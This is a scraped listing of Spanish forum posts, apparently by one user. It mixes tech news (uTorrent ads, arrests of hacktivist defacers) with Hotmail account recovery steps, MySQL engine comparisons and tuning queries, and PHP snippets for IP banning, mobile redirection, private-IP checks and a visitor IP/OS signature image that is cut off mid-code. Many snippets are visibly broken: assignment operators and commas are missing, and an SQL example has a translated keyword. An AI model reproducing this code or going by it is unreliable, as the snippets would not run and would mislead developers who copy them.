http://www.theinquirer.es/2012/08/10/espiarle-el-mail-a-tu-ex-y-revelar-la-informacion-puede-costarte-dos-anos-de-carcel.html
#163


BitTorrent, Inc., la empresa que se encarga del desarrollo del cliente P2P uTorrent, se financia, entre otras fuentes, mediante la publicidad mostrada en la barra del navegador que se ofrece durante el proceso de instalación de la aplicación.

A partir de la próxima versión de uTorrent, la publicidad también invadirá la interfaz de usuario de uTorrent, que reservará un rectángulo para mostrar banners. Este espacio se utilizará para difundir campañas relacionadas con sus propios productos, juegos, productos de seguridad o privacidad. También se empleará para promocionar la descarga de torrents esponsorizados, como música de nuevos artistas o directores de cine nóveles.

En principio, la visualización del banner no se podrá desactivar, aunque siempre podrá evitarse comprando la versión uTorrent Plus, que cuesta 24,95 $.

forum.utorrent.com/viewtopic.php?id=123040

fuente:
http://bandaancha.eu/foros/proxima-version-utorrent-tendra-banner-1696899
#164
La Policía Nacional ha detenido a dos jóvenes españoles acusados de pertenecer a una red hacktivista a la que atribuyen más de 14.000 ciberataques. Entre los organismos afectados hay bancos como el BBVA, la NASA, el Consejo de Seguridad Nuclear, los ministerios de Defensa de Reino Unido y Francia o la web de Telecinco. Los ataques afectan a 58 países.



Dos jóvenes, de 20 y 23 años de edad, han sido detenidos acusados de ser miembros activos de un grupo hacktivista experto en vulnerar los sistemas de seguridad de los servidores informáticos para cambiar la web original, según ha adelantado la Cadena SER. Es decir, intrusiones ilícitas, que alteran la imagen y el contenido de las web de las instituciones y organismos a los que consiguen acceder. Entre las empresas e instituciones españolas atacadas por este grupo destacan el Consejo de Seguridad Nacional, Telefónica, BBVA, Caixa Manresa y la web de Telecinco, un ciberataque que la cadena denunció en marzo de 2004.

Según la Policía, a través de la cuenta @latinhackteam - administrada por uno de los detenidos - daban publicidad a los ataques conocidos como deface o defacement. En la mayoría de los ataques se reivindican mensajes políticos.Una vez hackean el portal, los autorescambianla apariencia originalde la web por otra, generalmente con un texto o una imagen reivindicativa (a favor del medio ambiente ocontra la corrupión, por ejemplo), vulnerando las medidas de seguridad del servidor para acceder. La red latinhackteam, ocupa el cuarto puesto en el ranking mundial de ciberataques, con más de 14.000 intrusiones en 58 países y opera desde 2008. A través de www.zone-h.org el grupo reivindicaba cada uno de los actos. De hecho, la Policía utiliza el listado que ellos mismos difunden. Les imputan unos 240 ataques al mes en los cuatro últimos años, firmados bajo el nick de Ecore y adminp4nic, con una valoración media de los daños, de 9.000 euros por cada acción.

En los registros a los domicilios familiares donde vivían los jóvenes en Madrid y Jaén los agentes han intervenido una decena de equipos informativos. La policía desconoce el alcance de los ataques comedidos. Ahora analizan si los detenidos, al acceder a los sistemas informáticos, han podido llevarse material sensible, como las bases de datos de los bancos con información de los clientes. La primera denuncia se interpuso en el juzgado de Instrucción número 1 de Monforte de Lemos, Lugo. A los dos detenidos se les imputan delitos de daños informáticos, revelación de secretos y organización criminal.


Fuente:
http://www.cadenaser.com/tecnologia/articulo/detenidos-jovenes-hackers-atacaron-webs-nasa-bbva-otras/csrcsrpor/20120719csrcsrtec_1/Tes

Más info:
http://bandaancha.eu/articulos/detenidos-dos-espanoles-defacearon-web-8524


Nota de prensa:
http://www.policia.es/prensa/20120719_1.html
#165
Hardware / TonidoPlug 2
27 Junio 2012, 18:33 PM




No sé si alguien lo conoce, pero lo he descubierto hoy y me ha llamado la atención.

Se trata de un pequeño dispositivo (similar a una agenda o calculadora) que se enchufa a la corriente y hace de servidor nas o web o lo que queramos. Tiene puerto usb y puerto ethernet lógicamente.

El aparatito lleva linux dentro (debian) y le puedes añadir el disco duro sata 2,5 (tamaño portátil) de la capacidad que quieras (soporta fat32, ntfs, ext3, etc) , con lo que sustituye un pc que haga de servidor., pero ahoras en tamaño, consumo y espacio.

Se puede administrar vía web y con el teléfono móvil (Android e iOS). Tiene Wifi.

Puedes usarlo para sincronizar tu música o ficheros, hacer copias de seguridad, música en streaming, o puedes instalar torrent, además de tener tu propia "nube".

Vale unos 100$.

CitarPower Requirements: 100-240V, 50/60HZ
Memory: 512 MB of DDR3
Storage: 512 MB of Flash
Network: Gigabit Ethernet
Wireless: Wifi b/g/n
Interface: USB 2.0, SATA 2.5" internal

http://www.tonido.com/support/display/docs/TonidoPlug+Hardware
#166
"La cuenta se ha bloqueado temporalmente".

Citar"Esta cuenta está bloqueada actualmente y no puede enviar mensajes. Si crees que no has infringido las Condiciones de uso de Windows Live, ponte en contacto con el servicio de soporte técnico."

Desde ese momento tendrás limitado el acceso a tu cuenta de Hotmail y deberás seguir una serie de pasos para certificar que eres el dueño legítimo de esa cuenta y activarla de nuevo.



Soluciones

Windows Live ofrece dos modos de recuperar el control de tu cuenta: mediante un servicio de SMS y a través del servicio Windows Live Solution Center.

Vía SMS

Validación por SMS
https://sms.live.com/?wa=wsignin1.0

Para activar tu cuenta a través de tu teléfono móvil debes hacer lo siguiente:

1. Haz clic en el siguiente enlace

2. Inicia sesión en Windows Live (pese a tener la cuenta de correo bloqueada, deberías poder acceder) 3. Introduce tu número de móvil 4. Recibirás un mensaje con un código. Anótalo

5. Copia el código enviado a tu teléfono móvil 6. Tu cuenta habrá sido verificada. Sigue los pasos que se te indican en pantalla para desbloquear la cuenta.



Importante: una vez realizado este proceso, Windows Live te solicitará si quieres darte de alta en sus servicios de alertas por SMS. Estos servicios tienen un coste por mensaje recibido y enviado, de modo que si no lo deseas, no selecciones ninguna de las opciones

Nota: Este servicio no está presente en todos los países, así que puede darse el caso de que no puedas desbloquear tu cuenta de Hotmail con este método.

Correo alternativo

Si en su cuenta posee correo alternativo, puede cambiar la contraseña siguiendo los pasos del siguiente enlace:

https://account.live.com/password/reset

Vía Windows Live Solution Center

Si el servicio vía SMS no está disponible en tu país o bien no te hace gracia ir dando tu número de teléfono móvil, dispones de otro modo de activar tu cuenta: a través del servicio de soporte de Windows Live.

La primera vez que accedas a este servicio deberás crear un nombre de usuario e indicar una contraseña. Una vez hecho esto, deberás hacer lo siguiente:

1. Selecciona el producto relacionado con la pregunta: Hotmail

2. Indica el motivo de tu consulta: Error: "Tu cuenta ha sido temporalmente bloqueada"

3. Haz clic en "Continuar"

4. Realiza tu consulta, aportando los datos solicitados y marcando "Avisarme cuando alguien responda a esta pregunta". Un consejo: en el cuerpo del mensaje, escribe una dirección de correo electrónico alternativa.



En un período máximo de 24 horas, un moderador de Windows Live te contactará a través del mismo hilo de pregunta y te ayudará a desbloquear tu cuenta.


*Entra a Windows Live Solution Center
*Ingresa la dirección de correo que quieres recuperar. En el recuadro de abajo ingresa una dirección de correo en la cual el soporte de Windows Live se pueda poner en contacto contigo. Luego haz clic en Continuar
*En la página que aparece ingresa la mayor cantidad de información posible acerca de tu cuenta. Por ejemplo algo muy importante es ingresar alguna contraseña que hayas utilizado en el pasado para la cuenta que quieres recuperar. Toda esta información servirá para que el soporte de Windows Live esté seguro que eres el dueño de la cuenta. Luego haz clic en el botón Enviar
*El soporte de Windows Live te enviará un correo dentro de las 24 horas para informarte si brindaste suficiente información para recuperar tu cuenta.
#167
Hardware / Vídeo - PC lleno de polvo
6 Junio 2012, 17:00 PM
[youtube=425,350]http://www.youtube.com/watch?v=diCvsKmDsng[/youtube]

En los comentarios algún cachondo decía que Chuck Norris podía jugar con ese ordenador al máximo de fps posibles  ;D
#168
Código (php) [Seleccionar]
<?php
/* Listado con las IPs */
$ban_ip_list = array('68.180.206.184''64.233.167.99''207.46.232.182');

/* Listado con el rango de IP. Use the '*' as the range selector */
$ban_ip_range = array('69.*.83.197');

/* Ip Visitante */
$user_ip $_SERVER['REMOTE_ADDR'];

/* Mensaje que verá si está baneado */
$msg 'You do not have permission to access this page.';

/* Message to output if the IP is in the ban list */

    
if(in_array($user_ip$ban_ip_list))
{
  exit($msg);
}

/* Check if the Visitor's IP is in our range's list */

if(!empty($ban_ip_range))
{
foreach(
$ban_ip_range as $range)
{
$range str_replace('*','(.*)'$range);

    if(
preg_match('/'.$range.'/'$user_ip))
{
  exit($msg);
}
}
}
?>


Explicación de cómo banear correctamente un rango:

Ayuda:Cómo bloquear un rango
http://es.wikipedia.org/wiki/Ayuda:C%C3%B3mo_bloquear_un_rango

Usando mejor siempre el sufijo /24 para bloquear 256 ip's


Código (php) [Seleccionar]
<?
$banned[0]="x.x.x.x";
if (in_array($_SERVER['REMOTE_ADDR'],$banned))
{
header("HTTP/1.1 403 Forbidden");
exit;
}
?>



Código (php) [Seleccionar]
<?php
$ipArray 
file('ip.txt');
foreach (
$ipArray as $ipTest) {
  if (
substr_count($_SERVER['REMOTE_ADDR'],trim($ipTest)) != "0") { 
    
header('location: /banned.htm');  // the banned display page
    
die();
  }
}
?>



Código (php) [Seleccionar]
<?
$targetAddr = "123.123..*..*";  //yes is two dots

//this code will match any class of 123.123.x.x,
//you can also do "123.123.123..*" to do anything that is 123.123.123.x

if (ereg($targetAddr, $_SERVER['REMOTE_ADDR'])) {
    //remote address match, do something or don't do anything
} else {
   //do whatever you want to address that doesn't match
}
?>




Código (php) [Seleccionar]

<?php

$ip 
$_SERVER['REMOTE_ADDR'];
$ips_baneadas = array('10.0.0.1','192.0.0.1');
$contador count($ips_baneadas);


for (
$i=0$i<$contador$i++) {
if(
$ip == $ips_baneadas[$i]) { die("Tu Ip no esta permitida . $ip; } }


 
?>


Mirando un listado de ip's un fichero txt

Código (php) [Seleccionar]
<?php
$count_blocks 
0;
$ip_lines file("includes/ban.txt");
$count count($ip_lines);
foreach(
$ip_lines as $single_line){
 
$ip explode("#"$single_line);
 if(
$ip[1] == $_SERVER['REMOTE_ADDR']){
      die(
"Ip baneada.");
 }
}
 
?>



Código (php) [Seleccionar]
<?php
$banned_ip 
= array();
$banned_ip[] = '111.111.111.111';
$banned_ip[] = '111.111.111.112';
$banned_ip[] = '111.111.111.113';
$banned_ip[] = '111.111.111.114';

foreach(
$banned_ip as $banned) {
$ip $_SERVER['REMOTE_ADDR'];
if(
$ip == $banned){
echo 
"You have been banned!";
exit();
}
}
// rest of PHP Script here!
 
?>





Código (php) [Seleccionar]
<?php
function ban($range = array(), $ip '')
{
        
$ip longip(trim($ip));
        if(
$ip == FALSE)
        {
                return 
FALSE;
        }
        if(empty(
$ip))
        {
                return 
FALSE;
        }
        foreach(
$range AS $key => $val)
        {
                
$temp explode('-'$val);
                if(empty(
$temp[0]))
                {
                        return 
FALSE;
                }
                else
                {
                        
$start_ip longip(trim($temp[0]));
                        if(
$start_ip == FALSE)
                        {
                                return 
FALSE;
                        }
                }
                if(empty(
$temp[1]))
                {
                        if(
$ip == $start_ip)
                        {
                                return 
TRUE;
                        }
                }
                else
                {
                        
$stop_ip longip(trim($temp[1]));
                        if(
$stop_ip == FALSE)
                        {
                                return 
FALSE;
                        }
                }
                if(
$start_ip <= $ip && $ip <= $stop_ip)
                {
                        return 
TRUE;
                }
        }
        return 
FALSE;
}
function 
longip($ip)
{
        if(empty(
$ip))
        {
                return 
FALSE;
        }
        
$block explode('.'$ip);
        if(
count($block) != 4)
        {
                return 
FALSE;
        }
        
$i 3;
        
$block_ip 0;
        foreach(
$block as $k => $v)
        {
                
$v filter_var($vFILTER_VALIDATE_INT);
                if(
$v 0)
                {
                        
$v 0;
                }
                if(
$v 255)
                {
                        
$v 255;
                }
                
$block_ip += pow(256$i)*$v;
                
$i--;
        }
        return 
$block_ip;
}
 
//usage
$block_range = array(   '192.168.1.0 - 192.168.2.255',
                        
'192.168.4.0 - 192.168.4.255',
                        
'192.168.6.1'
                
);
 
$ip '192.168.3.255';
 
if(
ban($block_range'192.168.6.1'))
{
        echo 
"BAN\n";
}
else
{
        echo 
"UNBAN\n";
}

 
?>
#169
Con el lanzamiento de la rama de MySQL 5.5.x, InnoDB se ha convertido en el motor de almacenamiento por defecto, ya que antes era MyISAM.

Todos los que antes de comenzar a utilizar MySQL 5.5 se inició con MyISAM. Fue el motor de almacenamiento por defecto y tenías que buscarte la vida para utilizar otro motor. Fue una buena base de datos buscando, robusto, simple y rápido en muchos aspectos.

Pero llegó con las transacciones de InnoDB, bloqueo a nivel de fila, y una mejor recuperación de una caída de MyISAM. En algunos casos el rendimiento de algunos puntos de referencia InnoDB estaba detrás de MyISAM (selects, MyISAM leía más rápido que InnoDB).  Estaba, ya no lo está.

Ahora el rendimiento para la mayoría de las aplicaciones es mucho mejor con InnoDB a MyISAM. Y por eso a partir MySQL 5.5, InnoDB es el motor de almacenamiento por defecto.

Pero y si yo no necesito transacciones, no necesito el bloqueo de fila, y no me preocupa que la tabla se pueda corromper. ¿Entonces no necesito InnodB? También, porque la mayoría de las nuevas características están diseñadas alrededor de InnoDB. La agrupación de subprocesos, por ejemplo, va a aumentar en gran medida de la transacción por segundo y las transacciones son territorio InnoDB. La compresión de datos InnoDB permite leer más rápido en el disco duro.

Hay una gran cantidad de mitos que rodean el motor InnoDB ("más lento en Lecturas ',' sólo se utiliza si necesita claves foráneas o transacciones"). Básicamente, en MySQL 5.0, InnoDB todavía tenía problemas, en 5.5 no.

Pero InnoDB necesita optimización y tuning. InnoDB necesita afinación. En serio. MyISAM para muchas aplicaciones se puede trabajar bien con los valores por defecto. Se han visto a cientos de bases de datos con GB funcionando con MyISAM con la configuración predeterminada y ha funcionado razonablemente. InnoDB necesita recursos y no va a funcionar bien con los valores predeterminados.

Aún habiendo dicho todo lo anterior, si tenemos un foro, wiki, blog, cms o lo que sea, con gran porcentaje de consutlas sql de lecutra ( select (80% o más que suele ser lo habitual) se recomienda usar el motor MyISAM, porque es mucho más rápido y consume mucha menos cpu.

Aunque como siempre, cada caso es personalizado y lo mejor es realizar un test, benchmark para elegir adecuadamente el motor que mejor se ajuste a nuestras necesidades (ya sea de hardware o de tipos de consulta).

Motor de almacenamiento MyISAM (storage-engine)

El tipo MyISAM era el motor de almacenamiento por defecto que se le asigna a las tablas que se crean, si no se le indica que utilice otro tipo de motor. Se basa en el código ISAM lo que hace que sean tablas muy fiables, pero añadiendo nuevas características.

Cada tabla MyISAM se almacena en disco en tres ficheros. Los ficheros tienen nombres que comienzan con el nombre de tabla y tienen una extensión para indicar el tipo de fichero. Un fichero .FRM almacena la definición de tabla. El fichero de datos tiene una extensión .MYD mientras que el fichero índice tiene una extensión .MYI.

Uso de recursos: MyISAM consume una menor cantidad de memoria con respecto a su principal competidor, InnoDB, lo que la convierte en la mejor opción cuando se trata de servidores con recursos limitados.


MyISAM vs InnoDB - Diferencias Ventajas Desventajas Inconvenientes

MyISAM

- Bloqueo de tabla
- Aumento del rendimiento si nuestra aplicación realiza un elevado número de consultas "Select".
- Las tablas pueden llegar a dar problemas en la recuperación de datos.
- Permite hacer búsquedas full-text (se puede arreglar con Sphinx)
- Menor consumo memoria RAM

   Mayor velocidad en general a la hora de recuperar datos.
   Recomendable para aplicaciones en las que dominan las sentencias SELECT ante los INSERT / UPDATE.
   Ausencia de características de atomicidad ya que no tiene que hacer comprobaciones de la integridad referencial, ni bloquear las tablas para realizar las operaciones, esto nos lleva como los anteriores puntos a una mayor velocidad.

InnoDB

- Bloqueo de registros
- Soporte de transacciones
- Rendimiento
- Concurrencia
- Confiabilidad

Nos permite tener las características ACID (Atomicity, Consistency, Isolation and Durability: Atomicidad, Consistencia, Aislamiento y Durabilidad en español), garantizando la integridad de nuestras tablas.

Integridad de datos, cuando los contenidos se modifican con sentencias INSERT, DELETE o UPDATE, la integridad de los datos almacenados puede perderse de muchas maneras diferentes.

InnoDB se recupera de errores o reinicios no esperados del sistema a partir de sus logs, mientras que MyISAM requiere una exploración, reparación y reconstrucción de índices de los datos de las tablas que aún no habían sido volcadas a disco.

Además es probable que si nuestra aplicación hace un uso elevado de INSERT y UPDATE notemos un aumento de rendimiento con respecto a MyISAM.

Explicación Bloqueo de tablas:

Por ejemplo, cada vez que vea un tema en SMF, esto ocurre:

Código (sql) [Seleccionar]
UPDATE smf_topics
SET numViews numViews = + 1
DONDE = ID_TOPIC # # #
LIMIT 1;


Si la tabla está bloqueada, tendrá que esperar a que ... lo que esté sucediendo hasta el final. Lo mismo ocurre con varias personas viendo varios temas a la vez. Tienen que esperar en fila para la tabla de temas que estén disponibles.

Esto no es cierto para InnoDB. Si dos personas ver el mismo tema, sí ... tendrán que esperar a la actualización numViews. Pero si ellos ven diferentes temas, es inmediata.
#170
Tunning y optimización del fichero

/etc/my.cnf

¿Cómo puedo saber el  valor exacto y real que que ocupan mis tablas ya sean en MyISAM o InnoDB?

Para saber si usas tablas con el motor InnoDB y cuáles son:

Código (sql) [Seleccionar]
SELECT table_schema, table_name
FROM INFORMATION_SCHEMA.TABLES
WHERE engine = 'innodb';


Consulta para convertir una tabla a InnoDB

Código (sql) [Seleccionar]
ALTER TABLE tblname
ENGINE=InnoDB;


Consulta para convertir todas tus tablas InnoDB a MyISAM

Código (sql) [Seleccionar]
SELECT CONCAT('ALTER TABLE ',table_schema,'.',table_name,' engine=MyISAM;')
FROM information_schema.tables
WHERE engine = 'InnoDB';


Consulta para convertir todas tus tablas MyISAM a InnoDB

Código (sql) [Seleccionar]
SELECT CONCAT('ALTER TABLE ',table_schema,'.',table_name,' engine=InnoDB;')
FROM information_schema.tables
WHERE engine = 'MyISAM';



MyISAM key cache


Variable:
key_buffer_size =

Código (sql) [Seleccionar]
SELECT CONCAT(ROUND(KBS/POWER(1024,
IF(PowerOf1024<0,0,IF(PowerOf1024>3,0,PowerOf1024)))+0.4999),
SUBSTR(' KMG',IF(PowerOf1024<0,0,
IF(PowerOf1024>3,0,PowerOf1024))+1,1))
recommended_key_buffer_size FROM
(SELECT LEAST(POWER(2,32),KBS1) KBS
FROM (SELECT SUM(index_length) KBS1
FROM information_schema.tables
WHERE engine='MyISAM' AND
table_schema NOT IN ('information_schema','mysql')) AA ) A,
(SELECT 2 PowerOf1024) B;


Ejemplo Resultado:
recommended_key_buffer_size
463M

    (SELECT 0 PowerOf1024) genera resultado en Bytes
    (SELECT 1 PowerOf1024) genera resultado en KB
    (SELECT 2 PowerOf1024) genera resultado en MB
    (SELECT 3 PowerOf1024) genera resultado en GB

Comando shell script:

asumiendo que
datadir=/var/lib/mysql

Código (bash) [Seleccionar]
find /var/lib/mysql -name '*.MYI'|xargs du -shc

InnoDB Buffer Pol


innodb buffer pool

Variable
innodb_buffer_pool_size =

Código (sql) [Seleccionar]

SELECT CONCAT(ROUND(KBS/POWER(1024,
IF(PowerOf1024<0,0,IF(PowerOf1024>3,0,PowerOf1024)))+0.49999),
SUBSTR(' KMG',IF(PowerOf1024<0,0,
IF(PowerOf1024>3,0,PowerOf1024))+1,1)) recommended_innodb_buffer_pool_size
FROM (SELECT SUM(data_length+index_length) KBS FROM information_schema.tables
WHERE engine='InnoDB') A,
(SELECT 2 PowerOf1024) B;




En KB:

Código (sql) [Seleccionar]
SELECT SUM(data_length+index_length)/power(1024,1) IBPSize_KB
FROM information_schema.tables WHERE engine='InnoDB';


En MB:

Código (sql) [Seleccionar]
SELECT SUM(data_length+index_length)/power(1024,2) IBPSize_MB
FROM information_schema.tables WHERE engine='InnoDB';


En GB:

Código (sql) [Seleccionar]
SELECT SUM(data_length+index_length)/power(1024,3) IBPSize_GB
FROM information_schema.tables WHERE engine='InnoDB';



Más información y ejemplos:
http://wiki.elhacker.net/bases-de-datos/mysql/optimizacion
#171
A petición del usuario Graphixx:

http://foro.elhacker.net/php/grave_vulnerabilidad_php_en_modo_cgi-t361611.0.html;msg1747431#msg1747431

Se añade las nuevas urls de los vídeos de youtube para inscrutrar (embed) videos

Ahora si funciona el código de las nuevas urls:


[youtube=425,350]http://youtu.be/ZcUsR9DSSOk[/youtube]


Y el viejo también:


[youtube=425,350]http://www.youtube.com/watch?v=ZcUsR9DSSOk[/youtube]


También funciona con urls de youtube en https

La antigua expresión regular en PHP era:

Código (php) [Seleccionar]
$pattern = \'/http:\/\/.+v=(.+)(&.+)*/i\';

Ahora es un poquito más larga xD

Código (php) [Seleccionar]
$pattern = \'(http(?:s?)://(?:www\.)?youtu(?:be\.com/watch\?v=|\.be/)(\w*)(&(amp;)?[\w\?=]*)?)\';

Lo único que no sé si dejar un object o usar un iframe:

<object type="application/x-shockwave-flash" width="$2" height="$3" data="http://www.youtube.com/v/$1&ap=%2526fmt%3D18" allowScriptAccess="never"><param name="movie" value="http://www.youtube.com/v/$1&ap=%2526fmt%3D18"></param><param name="wmode" value="transparent"></param></object>

<iframe width="'.$2.'" height="'.$3.'" src="http://www.youtube.com/embed/'.$1.'" frameborder="0"></iframe>
#172
Nivel Web / SQL Injection Cheat Sheet
18 Mayo 2012, 19:14 PM
#173
Bases de Datos / MySQL y SSD: Uso y Tuning
18 Mayo 2012, 12:59 PM
Mayo 2012:

[youtube=425,350]http://www.youtube.com/watch?v=ccP5gKN-TK0[/youtube]

En este seminario vamos a discutir Solid State Drives internos y cómo afectan a su rendimiento. Puntos de referencia a nivel de IO para SATA (Intel 320 SSD) y tarjetas PCI-E (FusionIO y Virident), será presentado para mostrar el rendimiento absoluto y dan una indicación del rendimiento por dólar. También vamos a discutir cómo se puede usar MySQL y el servidor Percona con SSD, que los parámetros de ajuste son los más importantes, y lo que el rendimiento se puede esperar en el uso real de producción.

Descargar Presentaciones:
http://www.percona.com/redir/files/presentations/WEBINAR-MySQL-SSD.pdf

Video (mejor que el de youtube)
http://www.percona.tv/percona-webinars/mysql-and-ssd-usage-and-tuning
#174
Ejemplos:

Código (php) [Seleccionar]
<?php
$iphone 
strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if (
$iphone || $android || $palmpre || $ipod || $berry == true)
{
header('Location: http://mobile.site.com/');
//OR
echo "<script>window.location='http://mobile.site.com'</script>";
}
?>


Código (php) [Seleccionar]

$phones = array('iPhone', 'Android', 'BlackBerry');

if ( preg_match('/('.implode('|', $phones).')/i', $_SERVER['HTTP_USER_AGENT']) ){
redirect
}



Código (php) [Seleccionar]

$mobile = 'http://mobile.mysite.com/';

if ((strstr($_SERVER['HTTP_USER_AGENT'], 'iPhone')) && empty($_COOKIE["mobilesitez"]) && $_SERVER['REQUEST_URI']=="/") {
header("Location: " . $mobile);
}

Code added to mobile page:

function set_cookie () {
document.cookie = 'mobilesitez=mobilesitez; domain=.mysite.com;';
window.location = 'http://www.mysite.com/'
}



Código (php) [Seleccionar]
<?php
if(strstr($_SERVER['HTTP_USER_AGENT'],'iPhone') || strstr($_SERVER['HTTP_USER_AGENT'],'iPod'))
 {
  
header('Location: http://yoursite.com/iphone');
  exit();
}
?>



Código (php) [Seleccionar]
if( preg_match('/(up.browser|up.link|mmp|symbian|smartphone|midp|wap|webos|galaxy|phone|pocket|psp|treo|android|mobile|240x320|400X240|nitro|nokia|portalmmm|proxinet|blackberry|palm||series40|series60|s60|sonyericsson|e10i|samsung|nexus|htc|desire|ipod|itunes|vodafone|wap-|wapi|wapa|wapp|series40|series60|s60|sonyericsson)/i', $user_agent) ){
//do something here for all mobile phones
}



Código (php) [Seleccionar]
$mobile_agents = '!(tablet|pad|mobile|phone|symbian|android|ipod|ios|blackberry|webos)!i';
if(preg_match($mobile_agents, $_SERVER['HTTP_USER_AGENT']))
{
   // Mobile!
}


Código (php) [Seleccionar]

$mobile = false;
if(isset($_SERVER['HTTP_USER_AGENT']))
{
   $mobile_agents = '!(tablet|pad|mobile|phone|symbian|android|ipod|ios|blackberry|webos)!i';
   if(preg_match($mobile_agents, $_SERVER['HTTP_USER_AGENT']))
   {
       $mobile = true;
   }
}
#175
Código (php) [Seleccionar]
function ip_is_private($ip)
{
       $pri_addrs = array(
                         '10.0.0.0|10.255.255.255',
                         '172.16.0.0|172.31.255.255',
                         '192.168.0.0|192.168.255.255',
                         '169.254.0.0|169.254.255.255',
                         '127.0.0.0|127.255.255.255'
                        );

       $long_ip = ip2long($ip);
       if($long_ip != -1) {

           foreach($pri_addrs AS $pri_addr)
           {
               list($start, $end) = explode('|', $pri_addr);

                // IF IS PRIVATE
                if($long_ip >= ip2long($start) && $long_ip <= ip2long($end))
                return (TRUE);
           }
   }

return (FALSE);
}



Código (php) [Seleccionar]
if ( ip_is_private ( $ip_address1 ) )
{
   printf ( "%s is from a private address range\n", $ip_address1 );
}



Con PHP 5.2 o superior


Código (php) [Seleccionar]
<?php
 
function is_private_ip($ip)
{
     return !
filter_var($ipFILTER_VALIDATE_IPFILTER_FLAG_NO_PRIV_RANGE);
}
?>


Código (php) [Seleccionar]
if(filter_var($ip, FILTER_FLAG_NO_PRIV_RANGE)) {
 // it's valid
}


CitarFILTER_VALIDATE_IP = validar una ip
FILTER_FLAG_IPV4 = validar una ip v4
FILTER_FLAG_NO_PRIV_RANGE = validar una ip rango privado
FILTER_FLAG_NO_RES_RANGE = validar una ip rango reservado
FILTER_FLAG_IPV6 = validar una ip v6

Ejemplo valdiar ip excluyendo ip's privadas y reservadas

Código (php) [Seleccionar]
if(filter_var($ip, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
 // it's valid
}
#176
Código (php) [Seleccionar]

<?php
#
# file: JZOsig.php
# author: AnimAlf
#
# This lines are under the GNU General Public License.
# http://www.gnu.org/copyleft/gpl.html
#
# cph.keldenauto.com
#

header"Content-type: image/PNG" );

function 
RealIPget() {   
  if ( 
$_SERVER'HTTP_X_FORWARDED_FOR' ] != '' ) {
    
$client_ip =
      ( !empty( 
$_SERVER['REMOTE_ADDR' ]) ) ?
        
$_SERVER'REMOTE_ADDR' ]
          :
        ( ( !empty(
$_ENV'REMOTE_ADDR' ]) ) ?
        
$_ENV'REMOTE_ADDR' ]
           :
        
"unknown" );   
      
// los proxys van añadiendo al final de esta cabecera
      // las direcciones ip que van "ocultando". Para localizar la ip real
      // del usuario se comienza a mirar por el principio hasta encontrar
      // una dirección ip que no sea del rango privado. En caso de no
      // encontrarse ninguna se toma como valor el REMOTE_ADDR
      
$entries split'[, ]' $_SERVER 'HTTP_X_FORWARDED_FOR' ] );
   
      
reset$entries );
      while ( list( , 
$entry ) = each$entries ) )
      {
         
$entry trim$entry );
         if ( 
preg_match"/^([0-9]+.[0-9]+.[0-9]+.[0-9]+)/"$entry$ip_list ) )
         {
            
// http://www.faqs.org/rfcs/rfc1918.html
            
$private_ip = array(
                  
'/^0./',
                  
'/^127.0.0.1/',
                  
'/^192.168..*/',
                  
'/^172.((1[6-9])|(2[0-9])|(3[0-1]))..*/',
                  
'/^10..*/');
   
            
$found_ip preg_replace $private_ip$client_ip$ip_list ] );
   
            if ( 
$client_ip != $found_ip )
            {
               
$client_ip $found_ip;
               break;
            }
         }
      }
   }
   else
   {
      
$client_ip =
         ( !empty ( 
$_SERVER 'REMOTE_ADDR' ] ) ) ?
            
$_SERVER 'REMOTE_ADDR' ]
            :
            ( ( !empty ( 
$_ENV 'REMOTE_ADDR' ] ) ) ?
               
$_ENV 'REMOTE_ADDR' ]
               :
               
"unknown" );
   }
   return 
$client_ip;   
}

function 
DetectOs () {
  if(
eregi"linux",$_SERVER 'HTTP_USER_AGENT' ])){
    
$rtnStr "[GNU/Linux] Saludos a oOOoo TuXeR oOOoo";
  } elseif ( 
eregi "win32"$_SERVER 'HTTP_USER_AGENT' ] ) ||
      
eregi "Win 9x 4.90"$_SERVER 'HTTP_USER_AGENT' ] ) ||
      
eregi "windows 2000",$_SERVER ['HTTP_USER_AGENT' ] ) ||
      
eregi "(windows nt)( ){0,1}(5.0)"$_SERVER 'HTTP_USER_AGENT' ] ) ||
      
eregi "(windows nt)( ){0,1}(5.1)"$_SERVER 'HTTP_USER_AGENT' ] ) ||
      
eregi "(win)([0-9]{2})"$_SERVER 'HTTP_USER_AGENT' ], $regs ) ||
      
eregi "(windows) ([0-9]{2})"$_SERVER 'HTTP_USER_AGENT' ], $regs ) ||
      
eregi "(winnt)([0-9]{1,2}.[0-9]{1,2}){0,1}"$_SERVER 'HTTP_USER_AGENT' ], $regs ) ||
      
eregi "(windows nt)( ){0,1}([0-9]{1,2}.[0-9]{1,2}){0,1}"$_SERVER 'HTTP_USER_AGENT' ], $regs ) ) {
        
$rtnStr "Un Microsoftista por estos lares :))";
  } elseif ( 
eregi "mac"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
    
$rtnStr "(¯`·._.·-oOOoo-<[ Macintosh ]>-oOOoo-·._.·´¯)";
  } else {
    if ( 
eregi "(sunos) ([0-9]{1,2}.[0-9]{1,2}){0,1}",$_SERVER ['HTTP_USER_AGENT'],$regs ) ) {
      
$rtnStr "SunOS $regs[2]";
    } elseif ( 
eregi "(beos) r([0-9]{1,2}.[0-9]{1,2}){0,1}"$_SERVER 'HTTP_USER_AGENT' ], $regs ) ) {
      
$rtnStr "BeOS $regs[2]";
    } elseif ( 
eregi "freebsd"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
      
$rtnStr "FreeBSD";
    } elseif ( 
eregi "openbsd"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
      
$rtnStr "OpenBSD";
    } elseif ( 
eregi "irix"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
      
$rtnStr "IRIX";
    } elseif ( 
eregi "os/2"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
      
$rtnStr "OS/2";
    } elseif ( 
eregi "plan9"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
      
$rtnStr "Plan9";
    } elseif ( 
eregi "unix"$_SERVER 'HTTP_USER_AGENT' ] ) ||
      
eregi "hp-ux"$_SERVER 'HTTP_USER_AGENT' ] ) ||
        
eregi "X11"$_SERVER 'HTTP_USER_AGENT' ] ) ) {
        
$rtnStr "Unix";
    } elseif(
